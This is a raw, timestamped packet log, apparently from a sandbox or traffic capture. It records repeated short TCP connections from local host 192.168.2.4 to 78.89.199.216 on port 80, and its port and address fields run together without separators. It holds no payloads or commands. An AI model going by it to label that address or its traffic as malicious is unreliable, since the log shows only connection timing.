                                    Oct 13, 2024 17:02:44.428920984 CEST804974578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:44.429007053 CEST4974580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:44.429153919 CEST4974580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:44.429188013 CEST4974580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:44.434396029 CEST804974578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:44.434411049 CEST804974578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:45.651444912 CEST804974578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:45.651973963 CEST804974578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:45.652054071 CEST4974580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:45.652141094 CEST4974580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:45.655184984 CEST4974680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:45.658524990 CEST804974578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:45.661622047 CEST804974678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:45.661698103 CEST4974680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:45.661859989 CEST4974680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:45.661891937 CEST4974680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:45.669509888 CEST804974678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:45.669542074 CEST804974678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:46.864932060 CEST804974678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:46.865941048 CEST804974678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:46.866023064 CEST4974680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:46.866106033 CEST4974680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:46.871300936 CEST804974678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:46.873111010 CEST4974780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:46.881781101 CEST804974778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:46.882241964 CEST4974780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:46.882323980 CEST4974780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:46.882323980 CEST4974780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:46.888642073 CEST804974778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:46.888659954 CEST804974778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:48.087645054 CEST804974778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:48.088360071 CEST804974778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:48.088815928 CEST4974780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:48.088815928 CEST4974780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:48.092044115 CEST4974880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:48.094264984 CEST804974778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:48.097707033 CEST804974878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:48.098006964 CEST4974880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:48.098006964 CEST4974880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:48.098058939 CEST4974880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:48.104764938 CEST804974878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:48.105384111 CEST804974878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:49.323573112 CEST804974878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:49.323952913 CEST804974878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:49.324243069 CEST4974880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:49.346019030 CEST4974880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:49.351309061 CEST804974878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:49.375056982 CEST4974980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:49.380335093 CEST804974978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:49.380414009 CEST4974980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:49.380553007 CEST4974980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:49.380609989 CEST4974980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:49.385657072 CEST804974978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:49.386015892 CEST804974978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:50.630939007 CEST804974978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:50.631422997 CEST804974978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:50.631889105 CEST4974980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:50.631889105 CEST4974980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:50.634012938 CEST4975080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:50.637607098 CEST804974978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:50.639192104 CEST804975078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:50.639411926 CEST4975080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:50.639411926 CEST4975080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:50.639473915 CEST4975080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:50.645639896 CEST804975078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:50.645669937 CEST804975078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:51.846788883 CEST804975078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:51.847420931 CEST804975078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:51.847825050 CEST4975080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:51.847825050 CEST4975080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:51.850218058 CEST4975180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:51.854507923 CEST804975078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:51.856842995 CEST804975178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:51.857181072 CEST4975180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:51.857182026 CEST4975180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:51.857182026 CEST4975180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:51.862633944 CEST804975178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:51.863471031 CEST804975178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:53.051822901 CEST804975178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:53.052421093 CEST804975178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:53.053024054 CEST4975180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:53.053025007 CEST4975180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:53.055464983 CEST4975280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:53.058257103 CEST804975178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:53.060580015 CEST804975278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:53.060666084 CEST4975280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:53.060765028 CEST4975280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:53.060798883 CEST4975280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:53.066361904 CEST804975278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:53.066495895 CEST804975278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:54.269166946 CEST804975278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:54.269788027 CEST804975278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:54.269861937 CEST4975280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:54.269948959 CEST4975280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:54.272766113 CEST4975380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:54.274966002 CEST804975278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:54.277679920 CEST804975378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:54.277864933 CEST4975380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:54.277864933 CEST4975380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:54.277901888 CEST4975380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:54.283622980 CEST804975378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:54.283652067 CEST804975378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:55.482976913 CEST804975378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:55.483025074 CEST804975378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:55.483123064 CEST4975380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:55.483405113 CEST4975380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:55.485366106 CEST4975480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:55.488517046 CEST804975378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:55.490384102 CEST804975478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:55.490564108 CEST4975480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:55.490760088 CEST4975480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:55.490760088 CEST4975480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:55.496150017 CEST804975478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:55.496180058 CEST804975478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:56.675520897 CEST804975478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:56.676352978 CEST804975478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:56.676549911 CEST4975480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:56.676736116 CEST4975480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:56.678881884 CEST4975680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:56.681668997 CEST804975478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:56.683911085 CEST804975678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:56.684150934 CEST4975680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:56.685101032 CEST4975680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:56.685101986 CEST4975680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:56.690201044 CEST804975678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:56.690336943 CEST804975678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:58.136038065 CEST804975678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:58.136357069 CEST804975678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:58.136557102 CEST4975680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:58.136557102 CEST4975680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:58.139544010 CEST4976880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:58.141746998 CEST804975678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:58.144614935 CEST804976878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:58.144685030 CEST4976880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:58.144890070 CEST4976880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:58.144921064 CEST4976880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:58.150405884 CEST804976878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:58.150455952 CEST804976878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:59.375215054 CEST804976878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:59.375377893 CEST804976878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:59.375454903 CEST4976880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:59.375540018 CEST4976880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:59.380435944 CEST4977480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:59.380543947 CEST804976878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:59.385458946 CEST804977478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:59.385545969 CEST4977480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:59.385839939 CEST4977480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:59.385839939 CEST4977480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:59.391459942 CEST804977478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:59.391557932 CEST804977478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:00.567207098 CEST804977478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:00.567296982 CEST804977478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:00.567671061 CEST4977480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:00.567759991 CEST4977480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:00.570714951 CEST4978580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:00.573648930 CEST804977478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:00.576198101 CEST804978578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:00.580315113 CEST4978580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:00.580315113 CEST4978580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:00.583970070 CEST4978580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:00.586055994 CEST804978578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:00.589783907 CEST804978578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:01.794980049 CEST804978578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:01.795494080 CEST804978578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:01.795567036 CEST4978580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:01.795660973 CEST4978580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:01.800889015 CEST804978578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:01.815253019 CEST4979480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:01.820312023 CEST804979478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:01.820386887 CEST4979480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:01.839550972 CEST4979480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:01.839601040 CEST4979480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:01.844669104 CEST804979478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:01.844700098 CEST804979478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:03.054527998 CEST804979478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:03.055840015 CEST804979478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:03.055927992 CEST4979480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:03.056003094 CEST4979480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:03.058851957 CEST4980280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:03.062767982 CEST804979478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:03.064526081 CEST804980278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:03.064608097 CEST4980280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:03.064747095 CEST4980280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:03.064793110 CEST4980280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:03.070024014 CEST804980278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:03.070051908 CEST804980278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:04.301119089 CEST804980278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:04.301798105 CEST804980278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:04.302004099 CEST4980280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:04.302005053 CEST4980280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:04.304913998 CEST4981080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:04.308376074 CEST804980278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:04.311651945 CEST804981078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:04.311893940 CEST4981080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:04.311893940 CEST4981080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:04.311893940 CEST4981080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:04.317286968 CEST804981078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:04.317437887 CEST804981078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:05.654290915 CEST804981078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:05.654663086 CEST804981078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:05.654853106 CEST4981080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:05.655349970 CEST4981080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:05.657824993 CEST4981980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:05.660471916 CEST804981078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:05.663247108 CEST804981978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:05.663341999 CEST4981980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:05.663530111 CEST4981980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:05.663530111 CEST4981980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:05.668842077 CEST804981978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:05.668947935 CEST804981978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:06.907557964 CEST804981978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:06.907571077 CEST804981978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:06.907799959 CEST4981980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:06.907800913 CEST4981980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:06.914355040 CEST804981978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:07.007589102 CEST4982880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:07.016840935 CEST804982878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:07.017020941 CEST4982880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:07.017113924 CEST4982880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:07.017113924 CEST4982880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:07.025096893 CEST804982878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:07.025106907 CEST804982878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:08.189560890 CEST804982878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:08.190237999 CEST804982878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:08.190298080 CEST4982880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:08.190323114 CEST4982880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:08.193116903 CEST4983680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:08.195164919 CEST804982878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:08.197978020 CEST804983678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:08.198158026 CEST4983680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:08.198231936 CEST4983680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:08.198271036 CEST4983680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:08.203502893 CEST804983678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:08.203511953 CEST804983678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:09.445173025 CEST804983678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:09.445723057 CEST804983678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:09.445903063 CEST4983680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:09.445947886 CEST4983680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:09.448765993 CEST4984580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:09.450809002 CEST804983678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:09.453763962 CEST804984578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:09.453846931 CEST4984580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:09.453996897 CEST4984580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:09.454029083 CEST4984580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:09.459274054 CEST804984578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:09.459302902 CEST804984578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:10.849014997 CEST804984578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:10.849464893 CEST804984578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:10.849623919 CEST4984580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:10.849623919 CEST4984580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:10.854516029 CEST804984578.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:10.908196926 CEST4985680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:10.913525105 CEST804985678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:10.913723946 CEST4985680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:10.913814068 CEST4985680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:10.913814068 CEST4985680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:10.919189930 CEST804985678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:10.919346094 CEST804985678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:12.156563044 CEST804985678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:12.157402992 CEST804985678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:12.157474041 CEST4985680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:12.157555103 CEST4985680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:12.159852982 CEST4986480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:12.163930893 CEST804985678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:12.166126013 CEST804986478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:12.166194916 CEST4986480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:12.166707039 CEST4986480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:12.166743994 CEST4986480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:12.173557043 CEST804986478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:12.173567057 CEST804986478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:13.541337967 CEST804986478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:13.543642044 CEST804986478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:13.543698072 CEST4986480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:13.543751955 CEST4986480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:13.546578884 CEST4987380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:13.549077034 CEST804986478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:13.552542925 CEST804987378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:13.552614927 CEST4987380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:13.552712917 CEST4987380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:13.552731037 CEST4987380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:13.558378935 CEST804987378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:13.559869051 CEST804987378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:14.796607971 CEST804987378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:14.797261953 CEST804987378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:14.797727108 CEST4987380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:14.797727108 CEST4987380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:14.799767017 CEST4988280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:14.804766893 CEST804987378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:14.806061983 CEST804988278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:14.806171894 CEST4988280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:14.806333065 CEST4988280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:14.808027029 CEST4988280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:14.813427925 CEST804988278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:14.814769030 CEST804988278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:15.976577044 CEST804988278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:15.976699114 CEST804988278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:15.976762056 CEST4988280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:15.976871014 CEST4988280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:15.979903936 CEST4989080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:15.982258081 CEST804988278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:15.984932899 CEST804989078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:15.985001087 CEST4989080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:15.985131979 CEST4989080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:15.985166073 CEST4989080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:15.991193056 CEST804989078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:15.991204977 CEST804989078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:17.243900061 CEST804989078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:17.244674921 CEST804989078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:17.244744062 CEST4989080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:17.244831085 CEST4989080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:17.247486115 CEST4989680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:17.250129938 CEST804989078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:17.252420902 CEST804989678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:17.252489090 CEST4989680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:17.252623081 CEST4989680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:17.252645016 CEST4989680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:17.258215904 CEST804989678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:17.258349895 CEST804989678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:18.610971928 CEST804989678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:18.612153053 CEST804989678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:03:18.612427950 CEST4989680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:18.612427950 CEST4989680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:03:18.617937088 CEST804989678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:26.622078896 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:26.627234936 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:26.627331972 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:26.627563000 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:26.627563000 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:26.632961988 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:26.633461952 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:28.029043913 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:28.029155016 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:28.029184103 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:28.029228926 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:28.029230118 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:28.029321909 CEST5003880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:28.034533978 CEST805003878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:32.905869007 CEST5003980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:32.910968065 CEST805003978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:32.911178112 CEST5003980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:32.911271095 CEST5003980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:32.911271095 CEST5003980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:32.916522980 CEST805003978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:32.916553020 CEST805003978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:34.140043020 CEST805003978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:34.140116930 CEST805003978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:34.140280008 CEST5003980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:34.140326977 CEST5003980192.168.2.478.89.199.216
